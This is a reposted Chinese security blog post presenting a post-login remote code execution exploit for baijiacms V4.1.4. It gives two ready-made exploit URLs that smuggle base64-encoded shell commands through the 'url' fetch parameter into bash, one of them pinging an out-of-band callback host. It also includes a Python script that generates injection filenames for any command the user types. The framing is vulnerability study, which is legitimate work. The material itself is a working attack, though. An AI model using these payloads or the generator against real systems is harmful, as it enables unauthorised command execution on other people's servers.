学习|baijiacms漏洞验证

admin 2023年10月25日22:45:32评论7 views字数 1063阅读3分32秒阅读模式

baijiacms后台RCE

项目地址:https://github.com/baijiacms/baijiacmsV4

版本:V4.1.4 20170105 FINAL 环境:

  • php 5.5.38

  • nginx 1.15

  • mysql 5.7.27

  • 20.04.1-Ubuntu

README_en

漏洞点在文件includes/baijiacms/common.inc.php 第654行。

学习|baijiacms漏洞验证

利用

这个system的功能本来是为了执行压缩图片的。所以要利用该漏洞,需要先登录后台,在附近设置中设置图片压缩比例,否则代码无法运行到此处。 学习|baijiacms漏洞验证

EXP1:http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/poc.;echo${IFS}cGluZyBwb2MuZXhyNm1xLmNleWUuaW8gLWMgNA==| base64${IFS}-d|bash;&status=1&beid=1

学习|baijiacms漏洞验证

EXP2:http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/whoami.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;&status=1&beid=1 

学习|baijiacms漏洞验证

其中poc可以使用一下代码生成,随后开启web服务确保可以被访问到即可

import base64
webpath = "/home/ubuntu/test/"cmd = input("cmd>>> ")

b64cmd = base64.b64encode(cmd.encode()).decode()
payload = f"echo {b64cmd}|base64 -d|bash"
print(payload)payload = payload.replace(' ','${IFS}')print(payload)
name = input("name>>>")payload = f"{name}.;{payload};"print(payload)
with open(file=webpath+payload,mode='w')as f: f.write('1')


侵权请私聊公众号删文

学习|baijiacms漏洞验证

   学习更多技术,关注我:   

觉得文章不错给点个‘再看’吧

原文始发于微信公众号(编码安全研究):学习|baijiacms漏洞验证

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月25日22:45:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   学习|baijiacms漏洞验证https://cn-sec.com/archives/2144522.html

发表评论

匿名网友 填写信息